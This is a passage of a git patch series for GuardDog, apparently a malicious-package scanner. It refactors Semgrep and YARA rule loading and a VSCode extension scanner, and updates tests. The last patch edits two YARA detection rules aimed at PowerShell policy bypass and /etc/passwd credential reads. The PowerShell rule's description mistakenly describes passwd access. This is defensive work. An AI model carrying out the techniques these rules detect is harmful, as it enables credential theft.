len(m.strings) - rule_results[rule_name].append(finding) + rule_results[m.rule].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" @@ -278,7 +277,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map(lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) + rules_path = list(map( + lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -299,9 +299,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: def _invoke_semgrep(self, target: str, rules: Iterable[str]): try: SEMGREP_MAX_TARGET_BYTES = int( - os.getenv( - "GUARDDOG_SEMGREP_MAX_TARGET_BYTES", - 
MAX_BYTES_DEFAULT)) + os.getenv("GUARDDOG_SEMGREP_MAX_TARGET_BYTES", MAX_BYTES_DEFAULT)) SEMGREP_TIMEOUT = int( os.getenv("GUARDDOG_SEMGREP_TIMEOUT", SEMGREP_TIMEOUT_DEFAULT)) cmd = ["semgrep"] @@ -318,11 +316,7 @@ def _invoke_semgrep(self, target: str, rules: Iterable[str]): cmd.append(f"--max-target-bytes={SEMGREP_MAX_TARGET_BYTES}") cmd.append(target) log.debug(f"Invoking semgrep with command line: {' '.join(cmd)}") - result = subprocess.run( - cmd, - capture_output=True, - check=True, - encoding="utf-8") + result = subprocess.run(cmd, capture_output=True, check=True, encoding="utf-8") return json.loads(str(result.stdout)) except FileNotFoundError: raise Exception("unable to find semgrep binary") diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index ad00f8aa..197ec585 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -23,7 +23,7 @@ class SourceCodeRule: id: str file: str description: str - ecosystem: ECOSYSTEM + ecosystem: Optional[ECOSYSTEM] # None means "any ecosystem" @dataclass @@ -44,8 +44,7 @@ class SempgrepRule(SourceCodeRule): def get_sourcecode_rules( - ecosystem: ECOSYSTEM, kind: Optional[type] = None -) -> Iterable[SourceCodeRule]: + ecosystem: ECOSYSTEM, kind: Optional[type] = None) -> Iterable[SourceCodeRule]: """ This function returns the source code rules for a given ecosystem and kind. 
Args: @@ -55,7 +54,8 @@ def get_sourcecode_rules( for rule in SOURCECODE_RULES: if kind and not isinstance(rule, kind): continue - if rule.ecosystem != ecosystem: + # Include rules that match the specific ecosystem OR rules that apply to any ecosystem (None) + if rule.ecosystem is not None and rule.ecosystem != ecosystem: continue yield rule @@ -113,22 +113,22 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - rule_ecosystems = [] + # Determine ecosystem based on filename prefix if file_name.startswith("extension_"): - rule_ecosystems = [ECOSYSTEM.EXTENSION] + rule_ecosystem = ECOSYSTEM.EXTENSION else: - # If no specific ecosystem prefix, default to all ecosystems - rule_ecosystems = [ECOSYSTEM.PYPI, ECOSYSTEM.NPM, ECOSYSTEM.GO, ECOSYSTEM.GITHUB_ACTION, ECOSYSTEM.EXTENSION] + # If no specific ecosystem prefix, apply to any ecosystem + rule_ecosystem = None with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: rule_description = match.group(1) - for ecosystem in rule_ecosystems: - SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, - description=rule_description, - ecosystem=ecosystem - )) + + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=rule_ecosystem + )) diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index a5546660..e0360e0c 100644 --- a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -17,6 +17,7 @@ "Accept": "application/json;api-version=3.0-preview.1" } MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" +VSIX_FILE_EXTENSION = ".vsix" class ExtensionScanner(PackageScanner): @@ -39,14 +40,10 @@ def download_and_get_package_info(self, Returns: Tuple of (extension metadata(manifest 
and marketplace) info, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url( - package_name, version) + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) - file_extension = ".vsix" - vsix_path = os.path.join( - directory, package_name.replace( - "/", "-") + file_extension) - extracted_path = vsix_path.removesuffix(file_extension) + vsix_path = os.path.join(directory, package_name.replace("/", "-") + VSIX_FILE_EXTENSION) + extracted_path = vsix_path.removesuffix(VSIX_FILE_EXTENSION) log.debug(f"Downloading VSCode extension from {vsix_url}") @@ -63,7 +60,9 @@ def download_and_get_package_info(self, return combined_metadata, extracted_path def _get_marketplace_info_and_url( - self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + self, + package_name: str, + version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: """Get marketplace metadata and VSIX download URL""" payload = { "filters": [ @@ -84,21 +83,20 @@ def _get_marketplace_info_and_url( headers=MARKETPLACE_HEADERS, json=payload) - if response.status_code != 200: - raise Exception( - f"Received status code: {response.status_code} from VSCode Marketplace") + response.raise_for_status() data = response.json() if not data.get("results") or not data["results"][0].get("extensions"): - raise Exception( + raise ValueError( f"Extension {package_name} not found in marketplace") extension_info = data["results"][0]["extensions"][0] versions = extension_info.get("versions", []) if not versions: - raise Exception("No versions available for this extension") + raise ValueError( + f"No versions available for this extension: {package_name}") target_version = None if version is None: @@ -110,20 +108,20 @@ def _get_marketplace_info_and_url( target_version = v break if target_version is None: - raise Exception(f"Version {version} not found for extension") + raise ValueError( + f"Version {version} not found 
for extension: {package_name}") # Extract download URL files = target_version.get("files", []) vsix_url = None for file_info in files: - if file_info.get( - "assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: vsix_url = file_info.get("source") break if not vsix_url: - raise Exception( - "No VSIX download link available for this extension") + raise ValueError( + f"No VSIX download link available for this extension: {package_name}") # Extract statistics from the statistics array stats = {stat["statisticName"]: stat["value"] @@ -132,15 +130,13 @@ def _get_marketplace_info_and_url( # TODO: it might be interesting to add heuristics regarding the rating # cound and the weghtedRating (see the ranking algo hack) marketplace_metadata = { - "extensionName": extension_info.get( - "extensionName", ""), "flags": extension_info.get( - "flags", []), "download_count": int( - stats.get( - "downloadCount", 0)), "publisher": extension_info.get( - "publisher", {}), "publisher_flags": extension_info.get( - "publisher_flags", ""), "publisher_domain": extension_info.get( - "domain", ""), "publisher_isDomainVerified": extension_info.get( - "publisher_isDomainVerified", False), } + "extensionName": extension_info.get("extensionName", ""), + "flags": extension_info.get("flags", []), + "download_count": int(stats.get("downloadCount", 0)), + "publisher": extension_info.get("publisher", {}), + "publisher_flags": extension_info.get("publisher_flags", ""), + "publisher_domain": extension_info.get("domain", ""), + "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), } return marketplace_metadata, vsix_url @@ -165,13 +161,12 @@ def _extract_manifest_metadata(self, extracted_path: str) -> dict: manifest_data = json.load(f) log.debug( f"Successfully parsed package.json with {len(manifest_data)} keys") - except (json.JSONDecodeError, IOError) as e: + except Exception as e: log.warning( 
f"Failed to read manifest from {package_json_path}: {e}") return {} - registered_commands = manifest_data.get( - "contributes", {}).get("commands", []) + registered_commands = manifest_data.get("contributes", {}).get("commands", []) extracted_metadata = { "name": manifest_data.get("name", ""), "displayName": manifest_data.get("displayName", ""), From 1fdda8883abbd49e36a11791168817152fca3001 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Fri, 18 Jul 2025 15:48:55 +0200 Subject: [PATCH 5/7] nits ... --- guarddog/analyzer/sourcecode/__init__.py | 1 + 1 file changed, 1 insertion(+) diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 197ec585..d3e6b569 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -114,6 +114,7 @@ def get_sourcecode_rules( description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' # Determine ecosystem based on filename prefix + rule_ecosystem: Optional[ECOSYSTEM] if file_name.startswith("extension_"): rule_ecosystem = ECOSYSTEM.EXTENSION else: From 54b72e30e54866d68b1f9249e81792d033617585 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Mon, 21 Jul 2025 11:16:53 +0200 Subject: [PATCH 6/7] implement requested changes --- guarddog/analyzer/sourcecode/__init__.py | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index d3e6b569..86af3674 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -11,10 +11,13 @@ current_dir = pathlib.Path(__file__).parent.resolve() +EXTENSION_YARA_PREFIX = "extension_" # These data class aim to reduce the spreading of the logic # Instead of using the a dict as a structure and parse it difffently # depending on the type + + @dataclass class SourceCodeRule: """ @@ -114,12 +117,7 @@ def get_sourcecode_rules( description_regex = 
fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' # Determine ecosystem based on filename prefix - rule_ecosystem: Optional[ECOSYSTEM] - if file_name.startswith("extension_"): - rule_ecosystem = ECOSYSTEM.EXTENSION - else: - # If no specific ecosystem prefix, apply to any ecosystem - rule_ecosystem = None + rule_ecosystem: Optional[ECOSYSTEM] = ECOSYSTEM.EXTENSION if file_name.startswith(EXTENSION_YARA_PREFIX) else None with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) From e39c0ec44f9150223edd440ac62a40a3c945656d Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Tue, 22 Jul 2025 16:50:00 +0200 Subject: [PATCH 7/7] remove credits in yara rules| remove DTO structures in extension_scanner --- .../extension_powershell_policy_bypass.yar | 1 - ...tension_suspicious_passwd_access_linux.yar | 1 - guarddog/scanners/extension_scanner.py | 100 +++--------------- tests/core/test_extension_scanner.py | 51 +++------ 4 files changed, 30 insertions(+), 123 deletions(-) diff --git a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar index 926757a9..508df247 100644 --- a/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar +++ b/guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar @@ -2,7 +2,6 @@ rule DETECT_FILE_powershell_policy_bypass { meta: author = "T HAMDOUNI, Datadog" - credits = "" description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" strings: diff --git a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar index 76ffe20f..72930cb5 100644 --- a/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar +++ b/guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar @@ -2,7 +2,6 @@ 
rule DETECT_FILE_suspicious_passwd_access_linux { meta: author = "T HAMDOUNI, Datadog" - credits = "" description = "Detects suspicious read access to /etc/passwd file, which is often targeted by malware for credential harvesting" strings: diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index e0360e0c..51eead9e 100644 --- a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -1,4 +1,3 @@ -import json import logging import os import typing @@ -19,6 +18,14 @@ MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage" VSIX_FILE_EXTENSION = ".vsix" +# VSCode Marketplace API filter types +# FilterType 7 = publisherName.extensionName (search by exact extension identifier) +MARKETPLACE_FILTER_TYPE_EXTENSION_NAME = 7 + +# VSCode Marketplace API flags (bitwise combination) +# 446 = IncludeVersions | IncludeFiles | IncludeMetadata +MARKETPLACE_FLAGS_FULL_METADATA = 446 + class ExtensionScanner(PackageScanner): def __init__(self) -> None: @@ -38,9 +45,9 @@ def download_and_get_package_info(self, version: Specific version or default to latest Returns: - Tuple of (extension metadata(manifest and marketplace) info, extracted_path) + Tuple of (marketplace API response, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) + marketplace_data, vsix_url = self._get_marketplace_info_and_url(package_name, version) vsix_path = os.path.join(directory, package_name.replace("/", "-") + VSIX_FILE_EXTENSION) extracted_path = vsix_path.removesuffix(VSIX_FILE_EXTENSION) @@ -49,15 +56,7 @@ def download_and_get_package_info(self, self.download_compressed(vsix_url, vsix_path, extracted_path) - manifest_metadata = self._extract_manifest_metadata(extracted_path) - - combined_metadata = { - "marketplace": marketplace_metadata, - "manifest": manifest_metadata, - "source": "remote" - } - - return combined_metadata, extracted_path + return 
marketplace_data, extracted_path def _get_marketplace_info_and_url( self, @@ -69,13 +68,13 @@ def _get_marketplace_info_and_url( { "criteria": [ { - "filterType": 7, + "filterType": MARKETPLACE_FILTER_TYPE_EXTENSION_NAME, "value": package_name } ] } ], - "flags": 958 + "flags": MARKETPLACE_FLAGS_FULL_METADATA } response = requests.post( @@ -123,64 +122,7 @@ def _get_marketplace_info_and_url( raise ValueError( f"No VSIX download link available for this extension: {package_name}") - # Extract statistics from the statistics array - stats = {stat["statisticName"]: stat["value"] - for stat in extension_info.get("statistics", [])} - # ... and the marketplace metadata - # TODO: it might be interesting to add heuristics regarding the rating - # cound and the weghtedRating (see the ranking algo hack) - marketplace_metadata = { - "extensionName": extension_info.get("extensionName", ""), - "flags": extension_info.get("flags", []), - "download_count": int(stats.get("downloadCount", 0)), - "publisher": extension_info.get("publisher", {}), - "publisher_flags": extension_info.get("publisher_flags", ""), - "publisher_domain": extension_info.get("domain", ""), - "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), } - - return marketplace_metadata, vsix_url - - def _extract_manifest_metadata(self, extracted_path: str) -> dict: - """Extract metadata from the extension's package.json manifest""" - - log.debug(f"Starting manifest extraction from: {extracted_path}") - - package_json_path = None - for root, dirs, files in os.walk(extracted_path): - if "package.json" in files: - package_json_path = os.path.join(root, "package.json") - break - - if package_json_path is None: - log.warning(f"No package.json found in {extracted_path}") - return {} - - log.debug(f"Found package.json at: {package_json_path}") - try: - with open(package_json_path, 'r', encoding='utf-8') as f: - manifest_data = json.load(f) - log.debug( - f"Successfully parsed package.json with 
{len(manifest_data)} keys") - except Exception as e: - log.warning( - f"Failed to read manifest from {package_json_path}: {e}") - return {} - - registered_commands = manifest_data.get("contributes", {}).get("commands", []) - extracted_metadata = { - "name": manifest_data.get("name", ""), - "displayName": manifest_data.get("displayName", ""), - "description": manifest_data.get("description", ""), - "version": manifest_data.get("version", ""), - "publisher": manifest_data.get("publisher", ""), - "repository": manifest_data.get("repository", {}), - "activationEvents": manifest_data.get("activationEvents", []), - "categories": manifest_data.get("categories", []), - "registeredCommands": registered_commands, - } - - log.debug(f"Extracted manifest metadata: {extracted_metadata}") - return extracted_metadata + return data, vsix_url def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], None] = noop) -> dict: """ @@ -194,21 +136,11 @@ def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], No Returns: Scan results """ - # Extract manifest metadata from the extension directory - manifest_metadata = self._extract_manifest_metadata(path) - - # For local directory scanning, only use manifest metadata - package_info = { - "marketplace": {}, # Empty for local scans - "manifest": manifest_metadata, - "source": "local" - } - if rules is not None: rules = set(rules) - # Use full analyze method to include both metadata and sourcecode analysis - results = self.analyzer.analyze(path, package_info, rules) + # Use only sourcecode analysis for local scans, consistent with other ecosystems + results = self.analyzer.analyze_sourcecode(path, rules=rules) callback(results) return results diff --git a/tests/core/test_extension_scanner.py b/tests/core/test_extension_scanner.py index 9c533417..11041148 100644 --- a/tests/core/test_extension_scanner.py +++ b/tests/core/test_extension_scanner.py @@ -23,19 +23,15 @@ def 
test_download_and_get_package_info(): break assert package_json_found, "package.json should exist in the extracted extension" - assert "manifest" in data - assert "marketplace" in data - assert data["source"] == "remote" + # data now contains raw marketplace API response + assert "results" in data + assert len(data["results"]) > 0 + assert "extensions" in data["results"][0] + assert len(data["results"][0]["extensions"]) > 0 - marketplace = data["marketplace"] - assert "extensionName" in marketplace - assert "download_count" in marketplace - assert "publisher" in marketplace - - manifest = data["manifest"] - assert "name" in manifest - assert "version" in manifest - assert "publisher" in manifest + extension = data["results"][0]["extensions"][0] + assert "extensionName" in extension + assert "publisher" in extension def test_download_and_get_package_info_with_version(): @@ -45,8 +41,12 @@ def test_download_and_get_package_info_with_version(): assert path assert path.endswith("/gerane.Theme-FlatlandMonokai") - manifest = data["manifest"] - assert "version" in manifest + # data now contains raw marketplace API response + assert "results" in data + assert len(data["results"]) > 0 + extension = data["results"][0]["extensions"][0] + assert "versions" in extension + assert len(extension["versions"]) > 0 # Note: We're using a relatively stable extension that hasn't been updated in a long while @@ -101,26 +101,3 @@ def test_scan_local_extension_directory(): assert "issues" in result assert "results" in result - -def test_extract_manifest_metadata_nested_package_json(): - scanner = ExtensionScanner() - - with tempfile.TemporaryDirectory() as tmpdirname: - nested_dir = os.path.join(tmpdirname, "some", "nested", "path") - os.makedirs(nested_dir) - - package_json = { - "name": "nested-extension", - "version": "2.0.0", - "publisher": "nested-publisher" - } - - package_json_path = os.path.join(nested_dir, "package.json") - with open(package_json_path, 'w') as f: - 
json.dump(package_json, f) - - manifest = scanner._extract_manifest_metadata(tmpdirname) - - assert manifest["name"] == "nested-extension" - assert manifest["version"] == "2.0.0" - assert manifest["publisher"] == "nested-publisher" \ No newline at end of file